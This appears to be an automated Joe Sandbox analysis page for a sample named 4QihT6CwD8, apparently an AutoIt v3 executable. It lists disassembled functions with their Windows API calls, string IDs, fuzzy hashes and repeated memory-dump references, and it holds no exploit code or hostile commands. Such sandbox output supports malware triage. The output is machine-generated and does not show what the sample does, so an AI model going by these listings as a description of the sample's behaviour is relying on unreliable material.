                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                  • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                  • API String ID: 2910397461-517079104
                                  • Opcode ID: 86cc0955bc71e474cce9b7bbd1af5d833174a632f81ba0c46eab7b44f8de1566
                                  • Instruction ID: 0b0e944a15d5cab9207c1f7a14c2f21c525de89f26207b63ca708300c6074662
                                  • Opcode Fuzzy Hash: 86cc0955bc71e474cce9b7bbd1af5d833174a632f81ba0c46eab7b44f8de1566
                                  • Instruction Fuzzy Hash: 86B17C71A10215AFEB25DF68DC85FAF7BA9EB08711F004655F914EB2E0D770AD01CB94
                                  Function 003C4ADF Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON
                                  Download Yara Rule
                                  APIs
                                  • SetErrorMode.KERNEL32(00000001), ref: 003C4AED
                                  • GetDriveTypeW.KERNEL32(?,003ECB68,?,\\.\,003ECC08), ref: 003C4BCA
                                  • SetErrorMode.KERNEL32(00000000,003ECB68,?,\\.\,003ECC08), ref: 003C4D36
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: ErrorMode$DriveType
                                  • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                  • API String ID: 2907320926-4222207086
                                  • Opcode ID: a529f7f7acc1e239fe9dbacd79b8dfde1996788133e64f85ad6f771c4515adf0
                                  • Instruction ID: 2a309e4e82cf9b76d016c6da22978d2bd42197699fe1c89e8528fa37737847d4
                                  • Opcode Fuzzy Hash: a529f7f7acc1e239fe9dbacd79b8dfde1996788133e64f85ad6f771c4515adf0
                                  • Instruction Fuzzy Hash: 2161C530601205EBCB16DF14D9A2FAD77B4AB04304B21C41EF806EBAA5DB3AED81DB45
                                  Function 003E73E8 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetSysColor.USER32(00000012), ref: 003E7421
                                  • SetTextColor.GDI32(?,?), ref: 003E7425
                                  • GetSysColorBrush.USER32(0000000F), ref: 003E743B
                                  • GetSysColor.USER32(0000000F), ref: 003E7446
                                  • CreateSolidBrush.GDI32(?), ref: 003E744B
                                  • GetSysColor.USER32(00000011), ref: 003E7463
                                  • CreatePen.GDI32(00000000,00000001,00743C00), ref: 003E7471
                                  • SelectObject.GDI32(?,00000000), ref: 003E7482
                                  • SetBkColor.GDI32(?,00000000), ref: 003E748B
                                  • SelectObject.GDI32(?,?), ref: 003E7498
                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 003E74B7
                                  • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 003E74CE
                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 003E74DB
                                  • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 003E752A
                                  • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 003E7554
                                  • InflateRect.USER32(?,000000FD,000000FD), ref: 003E7572
                                  • DrawFocusRect.USER32(?,?), ref: 003E757D
                                  • GetSysColor.USER32(00000011), ref: 003E758E
                                  • SetTextColor.GDI32(?,00000000), ref: 003E7596
                                  • DrawTextW.USER32(?,003E70F5,000000FF,?,00000000), ref: 003E75A8
                                  • SelectObject.GDI32(?,?), ref: 003E75BF
                                  • DeleteObject.GDI32(?), ref: 003E75CA
                                  • SelectObject.GDI32(?,?), ref: 003E75D0
                                  • DeleteObject.GDI32(?), ref: 003E75D5
                                  • SetTextColor.GDI32(?,?), ref: 003E75DB
                                  • SetBkColor.GDI32(?,?), ref: 003E75E5
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                  • String ID:
                                  • API String ID: 1996641542-0
                                  • Opcode ID: b431ba84409479694bf2a20413b0abd2004fb481a914056842c1b47291f72a44
                                  • Instruction ID: f441fa48c2d80a3825227ab9492231bb9b9982dfe5a48569bf350e1aa34fc875
                                  • Opcode Fuzzy Hash: b431ba84409479694bf2a20413b0abd2004fb481a914056842c1b47291f72a44
                                  • Instruction Fuzzy Hash: 9E618D72900258AFDF129FA5DC88EEEBFB9EB09320F115215F911AB2E1D7709941DF90
                                  Function 003E0FF3 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetCursorPos.USER32(?), ref: 003E1128
                                  • GetDesktopWindow.USER32 ref: 003E113D
                                  • GetWindowRect.USER32(00000000), ref: 003E1144
                                  • GetWindowLongW.USER32(?,000000F0), ref: 003E1199
                                  • DestroyWindow.USER32(?), ref: 003E11B9
                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 003E11ED
                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 003E120B
                                  • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 003E121D
                                  • SendMessageW.USER32(00000000,00000421,?,?), ref: 003E1232
                                  • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 003E1245
                                  • IsWindowVisible.USER32(00000000), ref: 003E12A1
                                  • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 003E12BC
                                  • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 003E12D0
                                  • GetWindowRect.USER32(00000000,?), ref: 003E12E8
                                  • MonitorFromPoint.USER32(?,?,00000002), ref: 003E130E
                                  • GetMonitorInfoW.USER32(00000000,?), ref: 003E1328
                                  • CopyRect.USER32(?,?), ref: 003E133F
                                  • SendMessageW.USER32(00000000,00000412,00000000), ref: 003E13AA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                  • String ID: ($0$tooltips_class32
                                  • API String ID: 698492251-4156429822
                                  • Opcode ID: b228ab5d584daa540fe8cc5a89c9e8fdea643994a14ef7626caa27fdf692908d
                                  • Instruction ID: ee7127b67a3b1b3807f7bf7d9824d6666f14db8ed693f0ee6d6d7dfec7c3ce3d
                                  • Opcode Fuzzy Hash: b228ab5d584daa540fe8cc5a89c9e8fdea643994a14ef7626caa27fdf692908d
                                  • Instruction Fuzzy Hash: 67B18A71604391AFDB15DF65C884B6FBBE8FF84310F008A18F9999B2A1D771E845CB92
                                  Function 00368891 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00368968
                                  • GetSystemMetrics.USER32(00000007), ref: 00368970
                                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0036899B
                                  • GetSystemMetrics.USER32(00000008), ref: 003689A3
                                  • GetSystemMetrics.USER32(00000004), ref: 003689C8
                                  • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 003689E5
                                  • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 003689F5
                                  • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00368A28
                                  • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00368A3C
                                  • GetClientRect.USER32(00000000,000000FF), ref: 00368A5A
                                  • GetStockObject.GDI32(00000011), ref: 00368A76
                                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 00368A81
                                    • Part of subcall function 0036912D: GetCursorPos.USER32(?), ref: 00369141
                                    • Part of subcall function 0036912D: ScreenToClient.USER32(00000000,?), ref: 0036915E
                                    • Part of subcall function 0036912D: GetAsyncKeyState.USER32(00000001), ref: 00369183
                                    • Part of subcall function 0036912D: GetAsyncKeyState.USER32(00000002), ref: 0036919D
                                  • SetTimer.USER32(00000000,00000000,00000028,003690FC), ref: 00368AA8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                  • String ID: AutoIt v3 GUI
                                  • API String ID: 1458621304-248962490
                                  • Opcode ID: 5301fb5d670626c6b6f7996a064445014454bdb28e7761989386cab8d70530f6
                                  • Instruction ID: ceadc842f34b51b53c811907e67d4b8968af5b9affbcc688d93cb49e957c6e92
                                  • Opcode Fuzzy Hash: 5301fb5d670626c6b6f7996a064445014454bdb28e7761989386cab8d70530f6
                                  • Instruction Fuzzy Hash: DAB171716002099FDB15DF68DC85BAE3BB9FB49314F154229FA15EB2D0DB349841CF54
                                  Function 003B0D8B Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 003B10F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 003B1114
                                    • Part of subcall function 003B10F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,003B0B9B,?,?,?), ref: 003B1120
                                    • Part of subcall function 003B10F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,003B0B9B,?,?,?), ref: 003B112F
                                    • Part of subcall function 003B10F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,003B0B9B,?,?,?), ref: 003B1136
                                    • Part of subcall function 003B10F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 003B114D
                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 003B0DF5
                                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 003B0E29
                                  • GetLengthSid.ADVAPI32(?), ref: 003B0E40
                                  • GetAce.ADVAPI32(?,00000000,?), ref: 003B0E7A
                                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 003B0E96
                                  • GetLengthSid.ADVAPI32(?), ref: 003B0EAD
                                  • GetProcessHeap.KERNEL32(00000008,00000008), ref: 003B0EB5
                                  • HeapAlloc.KERNEL32(00000000), ref: 003B0EBC
                                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 003B0EDD
                                  • CopySid.ADVAPI32(00000000), ref: 003B0EE4
                                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 003B0F13
                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 003B0F35
                                  • SetUserObjectSecurity.USER32(?,00000004,?), ref: 003B0F47
                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 003B0F6E
                                  • HeapFree.KERNEL32(00000000), ref: 003B0F75
                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 003B0F7E
                                  • HeapFree.KERNEL32(00000000), ref: 003B0F85
                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 003B0F8E
                                  • HeapFree.KERNEL32(00000000), ref: 003B0F95
                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 003B0FA1
                                  • HeapFree.KERNEL32(00000000), ref: 003B0FA8
                                    • Part of subcall function 003B1193: GetProcessHeap.KERNEL32(00000008,003B0BB1,?,00000000,?,003B0BB1,?), ref: 003B11A1
                                    • Part of subcall function 003B1193: HeapAlloc.KERNEL32(00000000,?,00000000,?,003B0BB1,?), ref: 003B11A8
                                    • Part of subcall function 003B1193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,003B0BB1,?), ref: 003B11B7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                  • String ID:
                                  • API String ID: 4175595110-0
                                  • Opcode ID: 62bab4f2feb12aeb9d97a3562dbd5a5d27d490025947ad772d5e895fef62c85f
                                  • Instruction ID: 627a944a0aac659aa93e065e11d9cd083d4dc792b9a85a6b632fcbd8c6abdc7b
                                  • Opcode Fuzzy Hash: 62bab4f2feb12aeb9d97a3562dbd5a5d27d490025947ad772d5e895fef62c85f
                                  • Instruction Fuzzy Hash: 5E715E71A0020AABDF269FA4DC44FEFBBBCBF05304F058255FA19AA191D731DA05CB60
                                  Function 003DC3B7 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003DC4BD
                                  • RegCreateKeyExW.ADVAPI32(?,?,00000000,003ECC08,00000000,?,00000000,?,?), ref: 003DC544
                                  • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 003DC5A4
                                  • _wcslen.LIBCMT ref: 003DC5F4
                                  • _wcslen.LIBCMT ref: 003DC66F
                                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 003DC6B2
                                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 003DC7C1
                                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 003DC84D
                                  • RegCloseKey.ADVAPI32(?), ref: 003DC881
                                  • RegCloseKey.ADVAPI32(00000000), ref: 003DC88E
                                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 003DC960
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                  • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                  • API String ID: 9721498-966354055
                                  • Opcode ID: d20c34c230c0b6e587eb22d78b7d3f40577753a05a0f707261af88204f6ac978
                                  • Instruction ID: ec6409a3c2770d56f0a9986211032cb0926361b4dc224ff73a8c6bf4ca9babac
                                  • Opcode Fuzzy Hash: d20c34c230c0b6e587eb22d78b7d3f40577753a05a0f707261af88204f6ac978
                                  • Instruction Fuzzy Hash: 2E1267356242019FC716DF14D881E2AB7E5EF89724F15885DF88A9F3A2DB31EC45CB81
                                  Function 003E091E Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CharUpperBuffW.USER32(?,?), ref: 003E09C6
                                  • _wcslen.LIBCMT ref: 003E0A01
                                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 003E0A54
                                  • _wcslen.LIBCMT ref: 003E0A8A
                                  • _wcslen.LIBCMT ref: 003E0B06
                                  • _wcslen.LIBCMT ref: 003E0B81
                                    • Part of subcall function 0036F9F2: _wcslen.LIBCMT ref: 0036F9FD
                                    • Part of subcall function 003B2BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 003B2BFA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: _wcslen$MessageSend$BuffCharUpper
                                  • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                  • API String ID: 1103490817-4258414348
                                  • Opcode ID: 304c78855e54b9dc69efda9d874bff0c5ec553c8cf35a31671fe2d59972705ad
                                  • Instruction ID: 034c47dd6edbd4841e5c5c736922a0ca16c59643a222c4e635be89ccfa8e90d3
                                  • Opcode Fuzzy Hash: 304c78855e54b9dc69efda9d874bff0c5ec553c8cf35a31671fe2d59972705ad
                                  • Instruction Fuzzy Hash: 53E1DF312083918FC71ADF25C45096AB7F1BF88308F158A5DF8969B7A2D770ED85CB81
                                  Function 003DC998 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: _wcslen$BuffCharUpper
                                  • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                  • API String ID: 1256254125-909552448
                                  • Opcode ID: 1444ac8d622fb7c16153eea85af73a6cd3b0fd7bc92f2e7db9a41048fd5df322
                                  • Instruction ID: b62e0a16a55d848a521add2baf207359e419fec1196fa58b1695525f0f1a08b6
                                  • Opcode Fuzzy Hash: 1444ac8d622fb7c16153eea85af73a6cd3b0fd7bc92f2e7db9a41048fd5df322
                                  • Instruction Fuzzy Hash: 2771053363012B8BCB22DE7CE9416BA33A5AB61750F126527FC669B384E734DD85C390
                                  Function 003E833C Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • _wcslen.LIBCMT ref: 003E835A
                                  • _wcslen.LIBCMT ref: 003E836E
                                  • _wcslen.LIBCMT ref: 003E8391
                                  • _wcslen.LIBCMT ref: 003E83B4
                                  • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 003E83F2
                                  • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,003E361A,?), ref: 003E844E
                                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 003E8487
                                  • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 003E84CA
                                  • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 003E8501
                                  • FreeLibrary.KERNEL32(?), ref: 003E850D
                                  • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 003E851D
                                  • DestroyIcon.USER32(?), ref: 003E852C
                                  • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 003E8549
                                  • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 003E8555
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                  • String ID: .dll$.exe$.icl
                                  • API String ID: 799131459-1154884017
                                  • Opcode ID: a5f1e05ae005368f23df3636b681a379c9813eaf372a88332572372714a4725e
                                  • Instruction ID: 1bf7570e6da7a9bb6af52f8a31d54e524a0463fbc8891cfd97ed59b1a41b22bf
                                  • Opcode Fuzzy Hash: a5f1e05ae005368f23df3636b681a379c9813eaf372a88332572372714a4725e
                                  • Instruction Fuzzy Hash: D361F171940265BEEB26CF66CC81BBE77ACFB05711F104609F819EA0D1DF74A980CBA0
                                  Function 00357778 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
